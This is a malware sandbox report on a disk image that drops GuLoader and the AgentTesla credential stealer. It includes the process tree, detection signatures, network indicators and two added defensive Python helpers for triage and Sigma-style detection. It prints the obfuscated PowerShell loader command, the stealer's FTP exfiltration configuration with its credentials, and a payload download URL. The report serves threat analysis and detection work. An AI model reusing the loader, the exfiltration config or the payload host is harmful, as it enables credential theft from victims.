
Windows Analysis Report
Ze1Ueabtx5.img

Overview

General Information

Sample name: Ze1Ueabtx5.img (renamed because the original name is a hash value)
Original sample name: 2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096.unknown
Analysis ID: 1518114
MD5: de10bad1ae168cd0c81afb61723464ac
SHA1: a5e93224048e0681278eab54ff273068bbb56289
SHA256: 2a8d91f4633e838069bd4d2e4f90cf83327bae4efb9442f23198e40676c55096

Detection: AgentTesla, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious PowerShell Parameter Substring
Switches to a custom stack to bypass stack traces
Tries to harvest and steal PuTTY / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7544 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • Documenti di spedizione 0009333000459595995.exe (PID: 7784 cmdline: "E:\Documenti di spedizione 0009333000459595995.exe" MD5: 6C446FD0A3F6D498F5CBD0725CE7F232)
    • powershell.exe (PID: 7816 cmdline: "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wabmig.exe (PID: 2124 cmdline: "C:\Program Files (x86)\windows mail\wabmig.exe" MD5: BBC90B164F1D84DEDC1DC30F290EC5F6)
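The second PowerShell stage in the tree (PID 7816) never carries code on its command line: it reads Dyssen.Mod, carves three characters out of the file at offset 70317, and dot-invokes that three-character string as a command with the whole file as its argument. The carved token is therefore the name of an execution cmdlet and the file body is the next stage. The Python below is an added triage helper, not part of the Joe Sandbox report or of the malware; it recovers the carve parameters from the command line and reproduces the SubString on a copy of the file without running PowerShell. The real contents of Dyssen.Mod are not on this page, so the sample file built in the block is constructed with "IEX" at the offset as a stand-in, and the helper assumes the real file is a single line, so that Get-Content returns one string.

```python
import re
from typing import NamedTuple, Optional

# The loader command line as recorded in the process tree (PID 7816).
LOADER_CMDLINE = r'''"powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"'''

# Cmdlet names and aliases that turn a string into executed code. If the carved
# token is one of these, the remainder of the file is the next stage.
EXEC_TOKENS = {"iex", "invoke-expression", "icm", "invoke-command", "invoke-item"}


class LoaderSpec(NamedTuple):
    script_path: str   # file that is both the source of the "command name" and the argument
    offset: int        # start of the carved token inside that file
    length: int        # token length (3 here, which matches "iex")
    content_var: str   # variable holding the file contents
    cmd_var: str       # variable holding the carved token


_READ = re.compile(r"\$(?P<content>\w+)\s*=\s*(?:Get-Content|gc|cat|type)\s+'(?P<path>[^']+)'", re.I)
_CARVE = re.compile(r"\$(?P<cmd>\w+)\s*=\s*\$(?P<src>\w+)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)", re.I)
_INVOKE = re.compile(r"[.&]\s*\$(?P<cmd>\w+)\s*\(\s*\$(?P<arg>\w+)\s*\)")


def parse_loader(cmdline: str) -> Optional[LoaderSpec]:
    """Recognise the three-step pattern: read file -> carve a short token -> dot-invoke
    the token with the file as argument. Returns None unless all three steps are present
    and wired to the same variables, which keeps ordinary Get-Content usage from matching."""
    read, carve, invoke = _READ.search(cmdline), _CARVE.search(cmdline), _INVOKE.search(cmdline)
    if not (read and carve and invoke):
        return None
    if carve["src"] != read["content"] or invoke["cmd"] != carve["cmd"] or invoke["arg"] != read["content"]:
        return None
    return LoaderSpec(read["path"], int(carve["off"]), int(carve["len"]), read["content"], carve["cmd"])


def carve_token(spec: LoaderSpec, script: str) -> str:
    """Reproduce $var.SubString(offset, length) on the file contents. Assumes the file is a
    single line; a multi-line file would make Get-Content return an array instead."""
    if len(script) < spec.offset + spec.length:
        raise ValueError("file shorter than the carved offset; wrong file or wrong encoding")
    return script[spec.offset:spec.offset + spec.length]


def is_exec_primitive(token: str) -> bool:
    return token.strip().lower() in EXEC_TOKENS


def build_sample_script(offset: int, token: str = "IEX") -> str:
    # Constructed stand-in for Dyssen.Mod (the real file is not on the page): filler
    # up to the carved offset, then the token the loader expects to find there.
    return "#" * offset + token


if __name__ == "__main__":
    spec = parse_loader(LOADER_CMDLINE)
    sample = build_sample_script(spec.offset)
    tok = carve_token(spec, sample)
    print(f"{spec.script_path}: offset {spec.offset} len {spec.length} -> {tok!r} exec={is_exec_primitive(tok)}")
```

Run carve_token against the real Dyssen.Mod from the acneform directory instead of the constructed sample; if the token is not an execution primitive, check the file's encoding (a UTF-16 or BOM-prefixed file shifts the offset) before concluding the pattern differs.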
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XORed.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Extracted malware configuration (AgentTesla):
{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
YARA matches (source; rule; description; author):
0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp; JoeSecurity_CredentialStealer; Yara detected Credential Stealer; Joe Security
0000000B.00000002.3011574723.00000000244E1000.00000004.00000800.00020000.00000000.sdmp; JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp; JoeSecurity_AgentTesla_1; Yara detected AgentTesla; Joe Security
00000006.00000002.2470285181.0000000009291000.00000040.00001000.00020000.00000000.sdmp; JoeSecurity_GuLoader_2; Yara detected GuLoader; Joe Security
Process Memory Space: wabmig.exe PID: 2124; JoeSecurity_CredentialStealer; Yara detected Credential Stealer; Joe Security

            System Summary

Sigma match (process started; rule authors: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)):
  CommandLine: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
  Image / NewProcessName / OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ProcessId: 7544 (powershell.exe)
  ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7460 (cmd.exe)
  ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
  CommandLine|base64offset|contains: (empty)
Sigma match (file created; rule authors: frack113, Nasreddine Bencherchali (Nextron Systems)):
  EventID: 11
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7816
  TargetFilename: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe
Sigma match (process started; rule authors: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)):
  Same process-creation event as the first match: PID 7544, parent cmd.exe PID 7460, identical CommandLine, Image and ParentCommandLine fields.
Suricata alert:
  Timestamp: 2024-09-25T12:35:49.297316+0200
  SID: 2803270
  Severity: 2
  Classtype: Potentially Bad Traffic
  Source: 192.168.2.4:49737
  Destination: 185.29.11.53:80
  Protocol: TCP
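Two of the Sigma hits above fire on PID 7544, the Mount-DiskImage step that exposes the .img as drive E: (the delivery container, not the payload), and the third on PID 7816 writing a PE into AppData. The Python below is an added example, not Joe Security's rule engine and not the published Sigma rules: it re-implements the core logic of the two rules named in the signature list ("Suspicious PowerShell Parameter Substring" and "Potential Binary Or Script Dropper Via PowerShell") against constructed Sysmon-style events copied from this report, and adds a heuristic written for this example for the SubString dot-invoke loader plus a Mount-DiskImage check. The substring and extension lists are a subset chosen for the example, not the rules' full lists, and the two benign events are constructed.

```python
import re
from dataclasses import dataclass
from typing import List

# Lower-cased parameter fragments in the spirit of "Suspicious PowerShell Parameter Substring":
# abbreviated ExecutionPolicy / WindowStyle / NoProfile forms that admin usage rarely needs.
# Assumption: a subset chosen for this example, not the rule's full list.
SUSP_PARAM_SUBSTRINGS = (" -ex bypass", " -ep bypass", " -exec bypass", " -windowstyle h",
                         " -w h", " -windowstyle minimized", " -nop ", " -noni ")
# Extensions "Potential Binary Or Script Dropper Via PowerShell" cares about (subset, same assumption).
DROPPER_EXTS = (".exe", ".dll", ".ps1", ".vbs", ".js", ".hta", ".bat", ".cmd", ".scr")
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")


@dataclass
class SysmonEvent:
    event_id: int            # 1 = process create, 11 = file create
    image: str
    pid: int
    command_line: str = ""
    target_filename: str = ""


@dataclass
class Finding:
    rule: str
    pid: int
    evidence: str


def is_powershell(image: str) -> bool:
    return image.lower().endswith(POWERSHELL_IMAGES)


def rule_susp_parameter_substring(ev: SysmonEvent) -> List[Finding]:
    if ev.event_id != 1 or not is_powershell(ev.image):
        return []
    cl = " " + ev.command_line.lower() + " "      # pad so leading/trailing fragments match
    hits = [s.strip() for s in SUSP_PARAM_SUBSTRINGS if s in cl]
    return [Finding("Suspicious PowerShell Parameter Substring", ev.pid, ", ".join(hits))] if hits else []


def rule_dropper_via_powershell(ev: SysmonEvent) -> List[Finding]:
    if ev.event_id != 11 or not is_powershell(ev.image):
        return []
    if ev.target_filename.lower().endswith(DROPPER_EXTS):
        return [Finding("Potential Binary Or Script Dropper Via PowerShell", ev.pid, ev.target_filename)]
    return []


# read a file -> .SubString(offset, len) -> dot- or call-operator on a variable: the GuLoader stage above.
_SUBSTRING_LOADER = re.compile(r"get-content.+?\.substring\(\s*\d+\s*,\s*\d+\s*\).+?[.&]\s*\$\w+\s*\(", re.I | re.S)


def rule_substring_loader(ev: SysmonEvent) -> List[Finding]:
    # Heuristic written for this example, not a published Sigma rule.
    if ev.event_id != 1 or not is_powershell(ev.image):
        return []
    if _SUBSTRING_LOADER.search(ev.command_line):
        return [Finding("PowerShell SubString dot-invoke loader (heuristic)", ev.pid, ev.command_line[:80])]
    return []


def rule_disk_image_mount(ev: SysmonEvent) -> List[Finding]:
    # Mount-DiskImage from a command line: how the .img container became drive E: in this run.
    if ev.event_id == 1 and "mount-diskimage" in ev.command_line.lower():
        return [Finding("Disk image mounted from command line", ev.pid, "Mount-DiskImage")]
    return []


RULES = (rule_susp_parameter_substring, rule_dropper_via_powershell, rule_substring_loader, rule_disk_image_mount)


def evaluate(events) -> List[Finding]:
    return [f for ev in events for rule in RULES for f in rule(ev)]


PS = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed events modelled on the process tree and the EventID 11 record above, plus two benign ones.
SAMPLE_EVENTS = [
    SysmonEvent(1, PS, 7544, command_line="powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\\Windows\\path.txt)"),
    SysmonEvent(1, PS, 7816, command_line="\"powershell.exe\" -windowstyle minimized \"$Nasosubnasal=Get-Content "
                "'C:\\Users\\user\\AppData\\Local\\acneform\\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);"
                ".$Overwealthy($Nasosubnasal)\""),
    SysmonEvent(11, PS, 7816, target_filename="C:\\Users\\user\\AppData\\Local\\acneform\\Documenti di spedizione 0009333000459595995.exe"),
    SysmonEvent(1, PS, 9001, command_line="powershell.exe -NoProfile -Command Get-Service"),   # benign, constructed
    SysmonEvent(11, PS, 9001, target_filename="C:\\Users\\user\\Documents\\services.txt"),      # benign, constructed
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.evidence}")
```

The parameter-substring rule on its own is noisy in environments where admins script with -ex bypass; the combination of that hit with an EventID 11 PE write by the same PID, or with the SubString loader shape, is what separates this chain from routine use.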


            AV Detection

Source: http://ftp.concaribe.com, Avira URL Cloud: Label: malware
Source: cmd.exe.7460.0.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "ftp://ftp.concaribe.com", "Password": "net_log_releasing_connection"}
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown, HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb, source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb, source: powershell.exe, 00000006.00000002.2469658743.000000000882C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb, source: powershell.exe, 00000006.00000002.2465970106.000000000760E000.00000004.00000020.00020000.00000000.sdmp
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File opened: C:\Users\user\AppData\Roaming
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File opened: C:\Users\user
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File opened: C:\Users\user\AppData
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: Joe Sandbox View, IP Address: 192.185.13.234
Source: Joe Sandbox View, IP Address: 172.67.74.152
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: api.ipify.org
Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 185.29.11.53:80
Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bIGuEflfnZjESw74.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: 185.29.11.53 | Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 185.29.11.53 (50 flows recorded)
Source: global traffic, DNS traffic detected: DNS query: api.ipify.org
Source: global traffic, DNS traffic detected: DNS query: ftp.concaribe.com
Source: wabmig.exe, 0000000B.00000002.3010634020.0000000023A30000.00000004.00001000.00020000.00000000.sdmp, String found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.bin
Source: wabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.binf;c
Source: wabmig.exe, 0000000B.00000002.2999110092.00000000088B6000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://185.29.11.53/bIGuEflfnZjESw74.binj;W
Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://concaribe.com
Source: powershell.exe, 00000006.00000002.2460083974.00000000031B8000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: http://crl.micro
Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024505000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://ftp.concaribe.com
Source: Documenti di spedizione 0009333000459595995.exe, 00000005.00000002.1792758613.000000000040A000.00000004.00000001.01000000.00000003.sdmp, Documenti di spedizione 0009333000459595995.exe, 00000005.00000000.1768071577.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Ze1Ueabtx5.img, Documenti di spedizione 0009333000459595995.exe.2.dr, Documenti di spedizione 0009333000459595995.exe.6.dr, String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.2460639566.0000000004DF1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://aka.ms/pscore6lB
Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org
Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/
Source: wabmig.exe, 0000000B.00000002.3011574723.0000000024491000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.2460639566.0000000004F46000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.2463873076.0000000005E5D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown, Network traffic detected: HTTP traffic on port 49738 -> 443

            System Summary

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created (dropped file): \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created (dropped file): C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File created: C:\Windows\SysWOW64\sennepssovsen
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File created: C:\Windows\resources\0809
Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe 8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4
Source: classification engine, Classification label: mal100.troj.spyw.evad.winIMG@10/18@2/3
Source: C:\Windows\SysWOW64\cmd.exe, File created: C:\Users\user\Desktop\tmp.log
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, Mutant created: NULL
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eyckhu3o.ytd.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown, Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
Source: unknown, Process created: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe "E:\Documenti di spedizione 0009333000459595995.exe"
Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Nasosubnasal=Get-Content 'C:\Users\user\AppData\Local\acneform\Dyssen.Mod';$Overwealthy=$Nasosubnasal.SubString(70317,3);.$Overwealthy($Nasosubnasal)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: uxtheme.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: userenv.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: apphelp.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: propsys.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: dwmapi.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: cryptbase.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: oleacc.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: ntmarta.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: version.dll
            Source: \Device\CdRom1\Documenti di spedizione 0009333000459595995.exe | Section loaded: shfolder.dll
